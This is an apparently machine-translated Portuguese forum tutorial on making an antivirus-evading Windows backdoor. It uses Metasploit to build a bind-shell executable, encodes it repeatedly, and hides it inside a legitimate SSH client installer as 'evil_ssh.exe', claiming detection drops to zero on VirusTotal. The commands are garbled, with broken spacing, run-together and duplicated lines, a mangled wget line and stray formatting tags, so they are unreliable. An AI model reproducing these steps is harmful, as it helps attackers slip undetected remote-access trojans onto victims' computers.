Tweet
Neste tutorial vamos mostrar-lhe passo a passo sobre como fazer um vírus totalmente indetectável de todos os antivírus. Pensei que os seus são muitas abordagens, no entanto a nossa equipa membro Malik Rafay conseguiu encontrar uma maneira de fazer um executável usando FUD msfencode.
Requisitos
A máquina Backtrack, real ou virtual. Eu costumava Backtrack 5 R3, mas outras versões do Backtrack estão trabalhando OK também!
Atenção!
Estamos usando alguns arquivos de teste inofensivo, mas não infectam as pessoas com qualquer tipo de vírus reais, que é um crime e nós aqui no GH não somos responsáveis pelo que você vai fazer com esse método..
Objetivo:
Antivírus protege máquinas de malware, mas não tudo. existem maneiras de embalar malwares para torná-lo mais difícil de detectar. bem usar Metasploit para tornar malwares completamente invisível para antivírus.
Criando um Listener:
Esta é uma carga simples que dá o controle remoto de um invasor máquina. Não é uma formiga vírus não se espalhou, mas é detectado por antivírus. Em Backtrack em um Windows Terminal execute os seguintes comandos:
CD
msfpayload windows / shell_bind_tcp LPORT = 2482 X> / root / listen.exe
ls-l listen.exe
msfpayload windows / shell_bind_tcp LPORT = 2482 X> / root / listen.exe
ls-l listen.exe
Analisando o ouvinte com VirusTotal
Ir para Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Clique no botão [COLOR="rgb(153, 50, 204)"]"Escolher arquivo". Navegue para / [COLOR="rgb(153, 50, 204)"]root[/COLOR] e dê um duplo clique no listen.exe [COLOR="rgb(153, 50, 204)"]"listen.exe" [/COLOR]aparece na caixa [COLOR="rgb(153, 50, 204)"]"Escolher arquivo",[/COLOR] como mostrado abaixo:
Na página web VirusTotal, Clique no botão [COLOR="rgb(153, 50, 204)"]"escaneá-lo"![/COLOR]
Se você ver uma mensagem "O arquivo já analisados", clique em [COLOR="rgb(153, 50, 204)"]"Ver última análise"[/COLOR] botão.
A análise mostra que muitos dos antivírus detectou o arquivo - 33 de 42, quando eu fiz isso, como mostrado abaixo. Você pode ver números diferentes, mas muitos dos motores deve detectá-lo.
Codifica a Listener
este processo irá codificar o ouvinte, e inseri-lo em um arquivo SSH inocente.
Em BackTrack, em uma janela de terminal, execute os seguintes comandos:
wget Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... -i /root/listen.exe -t exe -x /root/sshSecureShellClient-3.2.9.exe -k -o /root/evil_ssh.exe -e x86/shikata_ga_nai -c 1 ls -l evil*
Digitalizar com VirusTotal
Ir para: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Se você ver uma mensagem "O arquivo já analisados", clique em "Ver última análise" botão.
A análise mostra que menos de antivírus detectar o arquivo agora - 21 de 42, quando eu fiz isso, como mostrado abaixo. Você pode ver números diferentes.
Codificar o Listener Novamente Este processo irá codificar o ouvinte com várias codificações diferentes.
Em BackTrack, em uma janela de terminal, execute os seguintes comandos:
msfencode -i /root/listen.exe -t raw -o /root/listen2.exe -e x86/shikata_ga_nai -c 1msfencode -i /root/listen2.exe -t raw -o
/root/listen3.exe -e x86/jmp_call_additive -c 1
msfencode -i /root/listen3.exe -t raw -o /root/listen4.exe -e x86/call4_dword_xor -c 1
msfencode -i /root/listen3.exe -t raw -o /root/listen4.exe -e x86/call4_dword_xor -c 1
msfencode -i /root/listen4.exe -o /root/listen5.exe -e x86/shikata_ga_nai -c 1 ls -l listen*
Analisando Novamente
A análise mostra que menos de antivírus detectar o arquivo agora 0 de 42 quando eu fiz isso como mostrado abaixo. você pode ver números diferentes.
[/COLOR]Sobre o autor
O artigo é escrito por Malik Rafay, Ele é um pesquisador independente de segurança e é o mais novo membro da equipe RHA.
Comment